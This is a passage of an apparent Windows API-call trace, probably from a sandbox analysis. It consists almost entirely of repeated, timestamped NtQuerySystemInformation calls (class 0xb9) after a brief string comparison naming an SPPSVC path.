(_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0283.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0283.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0283.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0283.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0283.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0283.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0283.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x28, ResultLength=0x0) [0283.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0283.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0283.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0283.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0283.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0283.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0283.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0283.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0283.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0283.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0283.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x50, ResultLength=0x0) [0283.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x50, ResultLength=0x0) [0283.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x50, ResultLength=0x0) [0283.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x50, ResultLength=0x0) [0283.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x50, ResultLength=0x0) [0283.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x50, ResultLength=0x0) [0283.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x50, ResultLength=0x0) [0283.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8a0, Length=0x38, ResultLength=0x0) [0283.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c6d0, Length=0x28, ResultLength=0x0) [0283.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c6d0, Length=0x28, ResultLength=0x0) [0283.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c6d0, Length=0x28, ResultLength=0x0) [0283.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c6d0, Length=0x28, ResultLength=0x0) [0283.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c740, Length=0x28, ResultLength=0x0) [0283.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8a0, Length=0x38, ResultLength=0x0) [0283.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c7c0, Length=0x28, ResultLength=0x0) [0283.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c7c0, Length=0x28, ResultLength=0x0) [0283.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c660, Length=0x20, ResultLength=0x0) [0283.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c5e0, Length=0x20, ResultLength=0x0) [0283.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c5e0, Length=0x20, ResultLength=0x0) [0283.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c5e0, Length=0x20, ResultLength=0x0) [0283.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8a0, Length=0x38, ResultLength=0x0) [0283.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8a0, Length=0x38, ResultLength=0x0) [0283.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c720, Length=0x20, ResultLength=0x0) [0283.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c6b0, Length=0x20, ResultLength=0x0) [0283.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c6b0, Length=0x20, ResultLength=0x0) [0283.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0283.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0283.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0283.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0283.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0283.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0283.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0283.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0283.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x28, ResultLength=0x0) [0283.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x28, ResultLength=0x0) [0283.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x28, ResultLength=0x0) [0283.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c990, Length=0x28, ResultLength=0x0) [0283.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0283.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0283.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0283.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0283.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x20, ResultLength=0x0) [0283.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0283.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0283.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0283.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0283.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x20, ResultLength=0x0) [0283.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x20, ResultLength=0x0) [0283.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x20, ResultLength=0x0) [0283.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0283.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0283.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0283.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0283.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0283.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0283.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0283.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0284.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x28, ResultLength=0x0) [0284.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x28, ResultLength=0x0) [0284.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x28, ResultLength=0x0) [0284.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c990, Length=0x28, ResultLength=0x0) [0284.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0284.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0284.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0284.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0284.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x20, ResultLength=0x0) [0284.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0284.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0284.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0284.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0284.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x20, ResultLength=0x0) [0284.010] NtQuerySystemInformation (SystemInformationClass=0xb9, 